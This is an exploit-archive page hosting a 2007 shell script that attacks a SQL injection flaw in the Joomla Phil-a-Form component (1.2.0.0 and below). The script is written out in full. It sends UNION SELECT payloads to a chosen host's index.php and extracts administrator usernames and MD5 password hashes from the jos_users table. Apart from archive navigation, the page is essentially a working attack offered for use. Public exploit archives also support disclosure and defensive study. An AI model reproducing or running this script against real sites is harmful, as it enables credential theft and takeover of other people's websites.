jcpf-sql.txt

jcpf-sql.txt: Posted May 30, 2007; Authored by Cody "CypherXero" Rester | Site cypherxero.net; Joomla Component Phil-a-Form versions 1.2.0.0 and below remote SQL injection exploit.; tags | exploit, remote, sql injection; SHA-256 | 4aacb6010d98e013eb30d5ac4b46b587e26948f18e53a71f3cef6f19a890ea88; Download | Favorite | View

jcpf-sql.txt

#!/bin/sh

#################################################################################
#                    #
#    Joomla Component Phil-a-Form <= 1.2.0.0 SQL Injection Exploit    #
#                    #
# Discovered by: Cody "CypherXero" Rester          #
# Payload: Admin Username and MD5 Hash Retrieval        #
# Website: http://www.cypherxero.net            #
# Shoutouts to the milw0rm community, the PIMP forums        #
# and my blog, of course                 #
#                    #
#################################################################################

echo "-------------------------------------------------------------------------"
echo "      Joomla Component Phil-a-Form <= 1.2.0.0 SQL Injection Exploit"
echo "-------------------------------------------------------------------------"
echo "Usage: sql_philaform_jos.sh [HOST] [FORM_ID]"
echo "[HOST] = Hostname of targetwebsite"
echo "[FORM_ID] = Form ID of Phil-a-Form post"
echo "e.g. sql_philaform_jos.sh http://www.targethost.com 2"
echo "-------------------------------------------------------------------------"
echo "                           Cody CypherXero Rester"
echo "                 http://www.cypherxero.net"
echo "-------------------------------------------------------------------------"

jos_username="%20UNION%20SELECT%20null,null,username,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20jos_users%20--"
jos_password="%20UNION%20SELECT%20null,null,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20jos_users%20--"
host="$1"
form_id="$2"

if [ "$form_id" == "" ]
then
echo "Syntax not correct! See usage example!"
exit 1
else
echo ""
fi

echo "Username" > $host.txt
echo "--------" >> $host.txt
links -dump "http://$host/index.php?option=com_philaform&form_id=$form_id$jos_username" | grep -i "philaform_" | awk -F\_ '{ print $2 }' | awk '{ print $1 }' >> $host.txt
echo " " >> $host.txt
echo "MD5 Password Hash" >> $host.txt
echo "-----------------" >> $host.txt
links -dump "http://$host/index.php?option=com_philaform&form_id=$form_id$jos_password" | grep -i "philaform_" | awk -F\_ '{ print $2 }' | awk '{ print $1 }' >> $host.txt

echo ""
cat $host.txt

exit 0

Top Authors In Last 30 Days

Red Hat 293 files
Ubuntu 61 files
Debian 34 files
Gentoo 32 files
LiquidWorm 10 files
nu11secur1ty 7 files
malvuln 5 files
Adam Gowdiak 4 files
liquidsky 3 files
kai6u 3 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,038)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,499)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,580)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,745)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,490)
UNIX (9,397)
UnixWare (187)
Windows (6,656)
Other

jcpf-sql.txt

jcpf-sql.txt

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

jcpf-sql.txt

Share This

jcpf-sql.txt

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems